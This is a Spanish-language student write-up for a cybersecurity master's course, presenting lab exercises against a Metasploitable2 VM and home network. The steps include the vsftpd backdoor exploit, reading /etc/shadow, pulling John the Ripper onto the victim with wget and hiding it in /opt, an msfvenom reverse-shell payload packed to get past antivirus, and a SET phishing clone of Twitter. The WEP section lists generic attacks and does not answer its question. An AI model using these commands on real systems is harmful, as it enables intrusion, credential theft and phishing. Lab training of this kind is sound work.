Está en la página 1de 36

Universidad Católica de Murcia.

Máster en Seguridad de la Información


y Continuidad de Negocio
(Ciberseguridad).
Módulo 5:
Desarrollo Seguro

Sebastián Vergara Herrera


Sebav1990@gmail.com

MSEGIN_M2T2_171123
0
Ejercicio 1
Enunciado
Realizar un proceso completo de intrusión sobre la máquina virtual proporcionada. Para ello
será necesario seguir las fases de una auditoria sobre sistemas. En el proceso el alumno
deberá hacer uso de herramientas como Nmap, Nessus, Metasploit, así como scripts de post-
explotación. La máquina virtual puede ser descargada del siguiente enlace:
https://downloads.sourceforge.net/project/metasploitable/Metasploitable2/metasploit
able-linux-2.0.0.zip
Todas las acciones deben realizarse desde otra máquina virtual con la distribución Kali Linux
o similar. Se deberá entregar los resultados obtenidos para la enumeración, análisis de
vulnerabilidades, explotación y post-explotación

Resolución

1.- Identificación de las Maquinas.

Maquina Local ( Kali Linux )


192.168.25.128

MSEGIN_M2T2_171123
1
Maquina Victima ( Metasploitable2 )
192.168.25.129

MSEGIN_M2T2_171123
2
2.- Utilización de NMAP

Desde el terminal de la máquina virtual Kali Linux nosotros vamos a realizar un barrido de la
IP con las IP del dominio para que la consulta nos devuelva todas las maquinas que se
encuentren dentro del dominio.

Teniendo identificada la maquina atacada (Metasploitable2) vamos a realizar un análisis de


los servicios que tiene activo nuestra victima con su puerto asociado. realizando una consulta
nmap –sS (escaneo de tipo SyncConect) –sV (escaneo de versión de los servicios que esta
utilizando) 192.168.25.129 (IP de la victima Metasploitable2)

MSEGIN_M2T2_171123
3
3.- Utilización de Metasploit Framework (I)
Se Utilizara el framework de Metasploit

MSEGIN_M2T2_171123
4
Para poder transferir un archivo a la maquina atacada nosotros vamos a trabajar con un
servicio ftp que es el puerto 21 que encontramos abierta en el dispositivo de la víctima
llamado vsftpd, desde el terminal de metasploit vamos a ingresar “search vsftpd” que nos
mostrara el exploit disponible para poder ejecutar que es
“exploit/unix/ftp/vsftpd_234_backdoor”, utlizamos el exploit con el comando use.
Una vez dentro deberemos ingresar el Host a atacar utilizando el comando set RHOST y la ip
de la victima.

MSEGIN_M2T2_171123
5
Una vez configurado el RHOST con la ip de la victima podemos ejecutar el exploit con el
comando correspondiente (exploit)

Se puede visualizar que existe un comando Shell abierto que corresponde al ataque se esta
haciendo a la victima.

MSEGIN_M2T2_171123
6
Una vez obtenida la conexión con la victima nosotros vamos a realizar las siguientes
consultas.
Vamos a ejecutar el comando cat (permite leer datos de archivos y mostrar sus contenidos)
/etc/passwod (ira a la carpeta raíz, etc y buscara el archivo password)

Nos devuelve el listado de todos los usuarios que existen en el sistema, posteriormente
utilizaremos el comando cat /etc/shadow para ver las contraseñas encriptadas de los
usuarios.

MSEGIN_M2T2_171123
7
4.- Configuracion de FTP en Maquina Local

Por comando en terminal vamos a levantar nuestro servidor apache en la maquina local

MSEGIN_M2T2_171123
8
1.- Edicion de Index.html
Una vez que tengamos el servicio apache arriba nosotros vamos a realizar una prueba, vamos
a ir donde se almacenan los archivos que está sirviendo nuestro servidor del FTP, editando el
html index dejando alguna breve descripción

MSEGIN_M2T2_171123
9
Desde el navegador iremos a la ip 127.0.0.1 que es la dirección local verificando que el servicio
se encuentra arriba

MSEGIN_M2T2_171123
10
2.- Configuration de “John the Ripper”.
Vamos a descargar la herramienta John que es un cracker de contraseña, vamos a guardarlo
en la maquina local.

Una vez descargado el archivo vamos a renombrar el archivo a John.tar.gz y lo vamos a copiar
a nuestro servidor FTP dentro de una carpeta “tools”

MSEGIN_M2T2_171123
11
MSEGIN_M2T2_171123
12
5.- Utilización de Metasploit Framework (II)
Desde la maquina vulnerada vamos a utilizar el comando wget con la maquina atacante
mediante http (por FTP) “wget http://192.168.25.128/tools/john.tar.gz” que descargara el
archivo desencriptador en la maquina atacada.

Una vez descargado el archivo quedara guardado en la carpeta raíz de la maquina de la


victima

MSEGIN_M2T2_171123
13
Es por eso que nosotros moveremos el archivo a la carpeta opt, simplemente con la intención
de esconderlo para que un administrador del sistema y no vea un archivo desconocido (John),
posteriormente descomprimimos el archivo. Con el comando “tar xvzf john.tar.gz”

MSEGIN_M2T2_171123
14
Una vez descomprimido el archivo accederemos a la carpeta del password cracker y veremos
que existen 3 carpetas doc, run y src, accederemos a la carpeta src que encontraremos un
monton de archivos .c

MSEGIN_M2T2_171123
15
Y vamos a “instalar John the Ripper password cracker” en la maquina de la victim con el
comando “make generic”

Post instalación, vamos a ir a la carpeta Run

MSEGIN_M2T2_171123
16
Vamos a ejecutar el comando “./unshadow /etc/passwd /etc/shadow > tocrack.txt” para
generar un archivo con la password desencriptada de los usuarios de la maquina vulnerada,
posteriomente de generar el archivo vamos a ejecutar el comando “./John tocrack.txt” para
que pueda crackear las credenciales mostrándonos las contraseñas de los usuarios de la
victima

MSEGIN_M2T2_171123
17
Ejercicio 2
Enunciado

Investigar las diferentes conexiones que permite el uso del payload Meterpreter en sistemas
Windows. Detallar la funcionalidad de cada una de ellas de forma general y profundizar en el
uso de 3 de ellas.

Resolución

Ejercicio 3
Enunciado

Investigar el uso de la herramienta MSFvenom, integrada dentro del framework Metasploit y


que sirve para la generación de payload sin necesidad de adjuntarlos a un exploit. Generar

MSEGIN_M2T2_171123
18
los 3 binarios para Windows definidos en detalle en el ejercicio anterior y comprobar su
funcionamiento en un sistema Windows sin sistemas de seguridad y/o antivirus.

Resolución
1.- Creacion de MSFVenom

Se realiza la investigación del uso de la herramienta MSFvenom en nuestra máquina virtual


Kali Linux, para ello nosotros vamos a abrir la terminal e ingresar el siguiente script
“msfvenom -l encoders”

Una vez seleccionado identificado el framework de msfvenom a utilizar nosotros vamos a


crear el Payload con el siguiente comando “msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.25.128 LPORT=4444 -e x86/shikata_ga_nai -f exe >
/root/Desktop/Paint.exe”

MSEGIN_M2T2_171123
19
Se ingresa el comando msfconsole

Se utiliza la librería exploit multi/handler con el comando “exploit/multi/handler”,


posteriormente se revisa que el Localhost este apuntando a la maquina KaliLinux

MSEGIN_M2T2_171123
20
2.- Preparacion para contaminar Maquina de la victima
Se comprime el ejecutable creado para poder pasarlo a la otra maquina virtual, ya que si se
trata de pasar de manera normal el sistema operativo de la maquina reconocerá la existencia
de un virus en la maquina y no dejara copiarla

En la maquina Victima (Maquina virtual) se descomprime el payload y se ejecuta.

MSEGIN_M2T2_171123
21
3.- Ataque
Realizaremos el ataque lanzándole un ataque con exploit

Una vez realizada la conexión nosotros tendremos acceso a su maquina, con la disponibilidad
de realizar las consultas con su terminal, como mostramos en el ejemplo siguiente
detectamos IP,

MSEGIN_M2T2_171123
22
Ejercicio 4
Enunciado

Realizar un análisis de vulnerabilidades mediante Nessus sobre el router del alumno

Resolución
Análisis de Vulnerabilidades del Router del Alumno con Nessus

MSEGIN_M2T2_171123
23
MSEGIN_M2T2_171123
24
Ejercicio 5
Enunciado

Desarrollar un ataque MiTM mediante el uso de la técnica ARP Spoofing en la red doméstica
del alumno. Se debe verificar que el tráfico de las víctimas es interceptado por la maquina
atacante.

Resolución
1.- Explicacion Man in the Middle
El concepto de un ataque MiTM es muy sencillo. Además, no se limita únicamente al ámbito
de la seguridad informática o el mundo online. Este método sólo necesita que el atacante se
sitúe entre las dos partes que intentan comunicarse; interceptando los mensajes enviados e
imitando al menos a una de ellas.

MSEGIN_M2T2_171123
25
2.- Preparacion Men in the middle

MSEGIN_M2T2_171123
26
3.- Preparacion de Ingenieria social

La ingenieria social, es la técnica que consigue engañar al usuario para obtener algo, para este
ejercicio lo que vamos a realizar es simular la página web de Twitter pero que en realidad es
nuestro Kali con un apache. Para este tutorial se va a utilizar la herramienta setoolkit que es
una herramienta extremadamente fácil de utilizar y que funciona muy bien.
Para empezar, vamos a abrir la terminal e ingresaremos el comando setoolkit

MSEGIN_M2T2_171123
27
Seleccionaremos la opción 1 que es la que mas se ajusta a nuestras necesidades

Aquí seleccionaremos la opción 2 para hacer un ataque de vector web

MSEGIN_M2T2_171123
28
Indicamos con la opción 3 que queremos hacer un ataque de credenciales

Y por último la opción 1 para utilizar un Template web

MSEGIN_M2T2_171123
29
3.- Seleccionamos 3

Esto nos pide la IP del Kali linux, si el ataque se quiere efectuar contra una persona que esté
en la red privada, vale con poner esta. Si se quiere ir contra una persona de fuera de la red,
hay que poner la IP pública y natear el puerto 80 en el router hacia la máquina kali.

MSEGIN_M2T2_171123
30
Y ya estaría en marcha, ahora para acceder a la web fake, hay que meter la IP del kali en el
navegador 192.168.25.128

Para realizar un ataque nosotros vamos a trabajar con la DNS que utilizaremos para el ataque
es por eso que accederemos al archivo hosts.txt

MSEGIN_M2T2_171123
31
Ingresaremos la IP de la maquina atacante con una url.

MSEGIN_M2T2_171123
32
4.- Acceso de la Victima a la página falsa Ingeniería social
Desde la maquina victima accederemos a la dns configurada, pudiendo accesar a la maqueta
creada de la clonación de la web

5.- Resultados
Se puede detectar las credenciales de la víctima registrada.

MSEGIN_M2T2_171123
33
Ejercicio 6
Enunciado

Investigar los principales vectores de ataque que permiten romper la seguridad de una red
WEP. Al menos se debe mostrar el detalle de 2 vectores diferentes.

Resolución
Existen dos tipos de vectores de ataques que permiten romper la seguridad de la red que son
los Ataques Activos y Pasivos que

Ataques activos
Spoofing: Se refiere al uso de técnicas para la suplantación de identidad.

Modificación: Consiste en modificar la tabla de enrutamiento del router con el fin de que el
remitente envíe su mensaje por un camino mas largo provocando gran retraso.

DDoS: El Ataque de Denegación de Servicios (DDoS) consiste en mantener la red ocupada


consumiendo el ancho de banda con mensajes constantes que alteran la normalidad de la
prestación de servicio.

Fabricación: Se genera un mensaje de enrutamiento falso para evitar que la información


llegue a destino.

Ataques Pasivos
Sniffing o Análisis de tráfico: Un atacante intenta detectar la ruta de comunicación entre
remitente y el receptor. El atacante puede encontrar la cantidad de datos que se desplazan
entre la ruta del remitente y del receptor. No hay modificación en los datos.

Escuchas furtivas: Se produce en la red móvil ad-hoc. El objetivo principal de este ataque es
averiguar información secreta o confidencial de la comunicación.

Supervisión: Ataque donde se pueden leer datos confidenciales, pero no se pueden editar los
mismos.

MSEGIN_M2T2_171123
34
Referencias:
1.- Nmap: https://nmap.org/man/es/
2.- John the ripper: https://www.openwall.com/john/

MSEGIN_M2T2_171123
35

También podría gustarte